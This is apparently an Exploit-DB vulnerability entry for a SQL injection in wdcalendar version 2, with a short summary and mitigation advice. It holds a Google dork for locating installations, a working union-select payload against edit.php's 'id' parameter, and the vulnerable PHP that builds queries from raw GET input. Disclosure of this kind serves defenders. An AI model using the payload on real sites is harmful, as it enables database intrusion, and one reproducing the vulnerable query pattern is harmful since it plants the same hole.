wdcalendar version 2 sql injection vulnerability

vendor:

wdcalendar

by:

Alfonso Castillo Angel

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: wdcalendar

Affected Version From: Version 2

Affected Version To: Version 2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 ultimate

2016

wdcalendar version 2 sql injection vulnerability

This exploit allows an attacker to inject SQL code into the 'id' parameter of the 'edit.php' file in wdcalendar version 2. By appending a union select statement to the parameter, an attacker can retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to properly filter and sanitize user input before using it in SQL queries. Additionally, developers should consider using prepared statements or parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: wdcalendar version 2 sql injection vulnerability
# Google Dork: allinurl:"wdcalendar/edit.php"
# Date: 12/09/2016
# Exploit Author: Alfonso Castillo Angel
# Software Link: https://github.com/ronisaha/wdCalendar
# Version: Version 2
# Tested on: Windows 7 ultimate
# Category: webapps

 * Affected file -> edit.php and edit.db.php
 * Exploit ->
http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--


 * Vulnerable code:

 function getCalendarByRange($id){
  try{
    $db = new DBConnection();
    $db->getConnection();
    $sql = "select * from `jqcalendar` where `id` = " . $id;  //the
variable is not filtered properly
    $handle = mysql_query($sql);
    //echo $sql;
    $row = mysql_fetch_object($handle);
}catch(Exception $e){
  }
  return $row;
}
if($_GET["id"]){
  $event = getCalendarByRange($_GET["id"]); //the variable is not filtered
properly